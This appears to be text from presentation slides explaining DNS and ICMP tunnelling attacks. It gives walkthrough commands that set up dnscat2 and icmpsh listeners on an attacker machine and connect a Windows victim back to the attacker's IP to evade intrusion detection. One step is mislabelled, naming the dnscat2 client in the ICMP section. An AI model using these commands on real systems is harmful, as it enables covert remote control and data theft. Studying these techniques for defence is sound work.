2. 2
Tunneling
Tunneling
Tunneling is a method of cyber attack that send and receive malicious data over a
legitimate protocol like: DNS, ICMP, SSH, HTTP ,HTTPS and make the data look innocent.
The malicious code is covered by one of the protocols and using legitimate ports make
the hacking harder to monitor and detect.
3. 3
DNS Tunneling
DNS Tunneling
DNS Tunneling is a method of cyber attack that encodes the data of other programs or
protocols in DNS queries and responses. DNS tunneling often includes data payloads that
can be added to an attacked DNS server and used to control a remote server and
applications.
When using this tecniqe the payload is harder to detect and can avoid ids/ips (Instruction
detection system / intrusion prevention system) and hide the traffic in a DNS protocol
which look legitimate on the the monitoring systems.
4. 4
DNS Tunneling - Example
DNS Tunneling - Example
One of the tools for DNS Tunneling is dnscat2.
Installing dnscat2 server on kali (Attacker).
• # apt-get update
• # apt-get -y install ruby-dev git make g++
• # gem install bundler
• # git clone https://github.com/iagox86/dnscat2.git
• # cd dnscat2/server
• # bundle install
• # ruby ./dnscat2.rb
Windows (Victim) runs dnscat2 client and connect to the attacker.
• dnscat2-v0.07-client-win32.exe --dns server=(Ip of attack)
5. 5
ICMP Tunneling
ICMP Tunneling
An ICMP tunnel is a method of cyber attack that encodes the data of other programs or
protocols using ICMP echo requests and reply packets establishes a covert connection
between two remote computers, using ICMP echo requests and reply packets.
When using this tecniqe the payload is harder to detect and can avoid ids/ips (Instruction
detection system / intrusion prevention system) and hide the traffic in a ICMP protocol
which look legitimate on the the monitoring systems.
6. 6
ICMP Tunneling - Example
ICMP Tunneling - Example
One of the tools for ICMP Tunneling is icmpsh.
Donwlaod icmpsh server on kali (Attacker).
https://github.com/inquisb/icmpsh
• sysctl -w net.ipv4.icmp_echo_ignore_all=1
• perl icmpsh-m.pl (Ip Attacker) (Ip Victim)
Windows (Victim) runs dnscat2 client and connect to the attacker.
• Icmpsh.exe -t (IP attacker)